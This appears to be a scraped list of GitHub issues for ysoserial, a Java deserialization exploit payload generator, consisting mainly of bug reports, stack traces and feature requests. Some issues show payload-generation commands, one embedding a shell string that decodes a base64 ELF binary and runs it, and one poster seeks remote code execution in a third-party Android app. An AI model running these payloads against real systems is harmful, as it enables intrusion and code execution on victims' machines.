
ysoserial's Issues

CommonsBeanutilsCollectionsLogging1 throws InvocationTargetException on deserialization

I'm trying out CommonsBeanutilsCollectionsLogging1 and while it does pass the Unit Test, it doesn't seem to actually lead to RuntimeExec execution during deserialization. Instead I get an exception from BeanComparator:

Haven't had a chance to add more debugging to BeanComparator yet, but did anyone else get this to work?

Exception in thread "main" java.lang.RuntimeException: InvocationTargetException: java.lang.reflect.InvocationTargetException
at org.apache.commons.beanutils.BeanComparator.compare(BeanComparator.java:171)
at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
at java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
at java.util.PriorityQueue.heapify(PriorityQueue.java:736)
at java.util.PriorityQueue.readObject(PriorityQueue.java:795)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
at testSerialization.Deserializer.main(Deserializer.java:14)

How to do a time-based delay

Java: in the case of a firewall, there is no echo.
Time-based,
or
specify a Java source code file, automatically call javac, or support an embedded class, and run the class.

Thread.sleep(5000);

or
Thread.sleep(arg);

[Enhancement] TemplatesImpl gadget for IBM Java

Hi,

The TemplatesImpl gadget used by most payloads does not work on IBM Java. Is there a way (or do you have some indications) to get the gadget working on IBM Java products?

Thank you a lot!

Federico

(False Positive) Error while generating "Spring1" payload

Hi, sorry, I am not very familiar with Java, but I tried to generate a payload using "Spring1" and ysoserial gives me the error shown in the attached file. I have tried the jar file from JitPack as well as the one built successfully on my machine using maven. Could you please help? I am using this:

commands :

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Spring1 "touch /tmp/serial" > payload.txt

error.txt

java -version

java version "1.8.0_171"
Java(TM) SE Runtime Environment (build 1.8.0_171-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.171-b11, mixed mode)

CommonsCollections5.java - wrong gadget chain in comments

It should be something like:

ObjectInputStream.readObject()
	BadAttributeValueExpException.toString()
		TiedMapEntry.toString()
			LazyMap.get()
				ChainedTransformer.transform()
					ConstantTransformer.transform()
					InvokerTransformer.transform()
						Method.invoke()
							Class.getMethod()
					InvokerTransformer.transform()
						Method.invoke()
							Runtime.getRuntime()
					InvokerTransformer.transform()
						Method.invoke()
							Runtime.exec()

Make AnnotationInvocationHandler usage dynamic

Right now, there are five different ways (in various branches and pull requests) to use AIH as part of a payload.

  1. The original way, patched in Java 7 and 8 earlier this year
  2. BadAttributeValueExpException (CC5), requires no SecurityManager present
  3. ACC's ListOrderedMap (my CC6: https://github.com/drosenbauer/ysoserial/blob/cli-improvements/src/main/java/ysoserial/payloads/CommonsCollections6.java)
  4. ConcurrentHashMap (@jasinner's CC6: jasinner@f1e23cc, proposed by @matthiaskaiser in #17)
  5. Another (?) CC6 in #50 by @matthiaskaiser, unless that's the same as his proposal in #17

Once #45 is done to everybody's satisfaction and merged in, these should all be combined back into the four original payloads, using a (defaulted) command line switch to select among them at generation time.

JitPack link 404s

The JitPack link in README.md 404s. The directory seems to be there, and I see logs, but the artifact does not appear to be available. There are a couple warnings in the build log I looked at, but at the end it does list the artifact, so it would seem that it was created.

Link:
https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar

To test:

user@localhost:~$ curl https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar
Build failed. See the log at jitpack.io

Can't create object from CommonsCollections2, CommonsCollections4 payloads on Android 6.0.1

Hi, firstly thanks for the great work on this, and apologies if this is a dupe or has been asked before.

I have found an app that includes the vulnerable Apache Commons Collections (4.0) library and an exported activity that uses getSerializableExtra() to get serialised data from the activity intent. I'd like to generate an object from the payloads (CommonsCollections2 and CommonsCollections4) created by ysoserial and send these in an intent from my 3rd party PoC app in an effort to achieve RCE in the context of the target app.

I have included the Commons Collections 4.0 library in my PoC app but am unable to generate the object to send in the intent, for either payload. It seems I am missing the TemplatesImpl and TrAXFilter gadgets from the classpath.

Is there a working payload for Android 6.0.1 at this time, am I missing something? Or is it better for me to look for a (new/modified) gadget chain myself?

Many thanks, logcat output below.

04-22 20:19:10.925 17261-17261/poc.chutchut.soserialpoc I/System.out: Generating object for payload: CommonsCollections2.bin
04-22 20:19:11.386 17261-17261/poc.chutchut.soserialpoc W/System.err: Exception generating serialised object from payload [CommonsCollections2.bin]: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
04-22 20:19:11.415 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.classForName(Native Method)
04-22 20:19:11.416 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.forName(Class.java:324)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2258)
at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1641)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.util.PriorityQueue.readObject(PriorityQueue.java:307)
at java.lang.reflect.Method.invoke(Native Method)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1330)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at poc.chutchut.soserialpoc.MainActivity.getObject(MainActivity.java:43)
at poc.chutchut.soserialpoc.MainActivity.access$100(MainActivity.java:13)
at poc.chutchut.soserialpoc.MainActivity$1.onClick(MainActivity.java:30)
at android.view.View.performClick(View.java:5204)
at android.view.View$PerformClick.run(View.java:21153)
at android.os.Handler.handleCallback(Handler.java:739)
at android.os.Handler.dispatchMessage(Handler.java:95)
at android.os.Looper.loop(Looper.java:148)
at android.app.ActivityThread.main(ActivityThread.java:5417)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" on path: DexPathList[[zip file "/data/app/poc.chutchut.soserialpoc-2/base.apk"],nativeLibraryDirectories=[/data/app/poc.chutchut.soserialpoc-2/lib/arm, /vendor/lib, /system/lib]]
04-22 20:19:11.417 17261-17261/poc.chutchut.soserialpoc W/System.err: at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
... 29 more
Suppressed: java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
at java.lang.Class.classForName(Native Method)
at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
... 30 more
Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
04-22 20:19:11.425 17261-17261/poc.chutchut.soserialpoc W/System.err: Object is null!
04-22 20:19:11.425 17261-17261/poc.chutchut.soserialpoc I/System.out: Generating object for payload: CommonsCollections4.bin
04-22 20:19:11.435 17261-17261/poc.chutchut.soserialpoc W/System.err: Exception generating serialised object from payload [CommonsCollections4.bin]: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
04-22 20:19:11.436 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.classForName(Native Method)
at java.lang.Class.forName(Class.java:324)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2258)
at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1641)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
at java.io.ObjectInputStream.readNewClass(ObjectInputStream.java:1512)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:755)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readNewArray(ObjectInputStream.java:1488)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:759)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
04-22 20:19:11.437 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.util.PriorityQueue.readObject(PriorityQueue.java:303)
at java.lang.reflect.Method.invoke(Native Method)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1330)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at poc.chutchut.soserialpoc.MainActivity.getObject(MainActivity.java:43)
at poc.chutchut.soserialpoc.MainActivity.access$100(MainActivity.java:13)
at poc.chutchut.soserialpoc.MainActivity$1.onClick(MainActivity.java:30)
at android.view.View.performClick(View.java:5204)
at android.view.View$PerformClick.run(View.java:21153)
at android.os.Handler.handleCallback(Handler.java:739)
at android.os.Handler.dispatchMessage(Handler.java:95)
at android.os.Looper.loop(Looper.java:148)
at android.app.ActivityThread.main(ActivityThread.java:5417)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter" on path: DexPathList[[zip file "/data/app/poc.chutchut.soserialpoc-2/base.apk"],nativeLibraryDirectories=[/data/app/poc.chutchut.soserialpoc-2/lib/arm, /vendor/lib, /system/lib]]
04-22 20:19:11.438 17261-17261/poc.chutchut.soserialpoc W/System.err: at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
... 59 more
Suppressed: java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
at java.lang.Class.classForName(Native Method)
at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
... 60 more
Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
04-22 20:19:11.439 17261-17261/poc.chutchut.soserialpoc W/System.err: Object is null!

bug: javassist.CannotCompileException: [source error] ) is missing

java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'  > tmp/payload.bin

Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more

CommonsCollections1 cannot run

My environment is

windows 10 pro

java version "1.8.0_131"
Java(TM) SE Runtime Environment (build 1.8.0_131-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.131-b11, mixed mode)

So when I run the ysoserial CommonsCollections1 in IDEA 2017

I see the error on my monitor.

The error output is:

generating payload object(s) for command: 'calc.exe'
serializing payload
deserializing payload
java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)
at com.sun.proxy.$Proxy0.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2136)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2027)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1535)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:422)
at ysoserial.Deserializer.deserialize(Deserializer.java:27)
at ysoserial.Deserializer.deserialize(Deserializer.java:22)
at ysoserial.payloads.util.PayloadRunner.run(PayloadRunner.java:39)
at ysoserial.payloads.CommonsCollections1.main(CommonsCollections1.java:84)

And CommonsCollections3 behaves the same as CommonsCollections1.

Thank you!

JRMPClient payload: how does it work?

Hello:

Can the author of this payload please provide the steps for this exploit to work?

I streamed the payload into a WebLogic instance but I get an exception.
I also tried to create a JRMPListener and use them together but with no success. I guess I do not understand how this payload should work.

Can you please help me?

Thank you!

org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception

Running:

$ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar CommonsCollections4 calc.exe > ysoserial-cc4-calc-payload.bin

And feeding that to a Java 8, Spring 4.3 app hosted on Tomcat 8.5 with the following code:

InputStream stream = new FileInputStream("ysoserial-cc4-calc-payload.bin");
ObjectInputStream in = new ObjectInputStream(stream);
in.readObject();   // gadget chain runs inside PriorityQueue.readObject() before this returns
in.close();

Leads to:

org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:982)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:124)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
java.lang.reflect.InvocationTargetException
	sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	java.lang.reflect.Constructor.newInstance(Constructor.java:423)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
java.lang.NullPointerException
	com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet.postInitialization(AbstractTranslet.java:372)
	com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:456)
	com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:486)
	com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.<init>(TrAXFilter.java:64)
	sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	java.lang.reflect.Constructor.newInstance(Constructor.java:423)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

Automated generation of object-graph and call-tree documentation

To facilitate easier studying of these types of vulnerabilities the tool scaffolding should be able to instrument itself to generate ASCII diagrams of payload object-graphs (similar to this) and deserialization code execution call-trees (similar to this) to understand the mechanics of each gadget chain better. Simply providing a list of gadget classes could be useful, and a more sophisticated implementation could embed and/or link to code/methods executed during deserialization.

Optionally allow such documentation to be printed to the console as verbose-mode help text when using the CLI interface.

PrintUtil from #16 is probably a good start for object graph inspection

Instrumentation stuff:

CLI improvements

CLI arg/param parsing should support the following:

  • reusing payload param definition/processing from within exploits
  • relatively easy addition of gadgets/payloads/exploits and interoperability with existing (compatible) gadgets/payloads/exploits
  • have a reasonable chance of supporting unforeseen exploits/chains/bypasses/etc with minimal changes
  • wider variety of gadgets (non-RCE types)
  • arbitrary parameters for exploits/gadgets (exploit target host/port/path, remote load gadgets, file paths/contents, etc)
  • nesting of payload objects (for wrapping with bypasses, etc) and binding into nested structures
  • annotating payload objects with serialization format and peer/child payload object compatibility
  • automatically generate help text that shows allowable values for fixed-option parameters

Multiple Commands

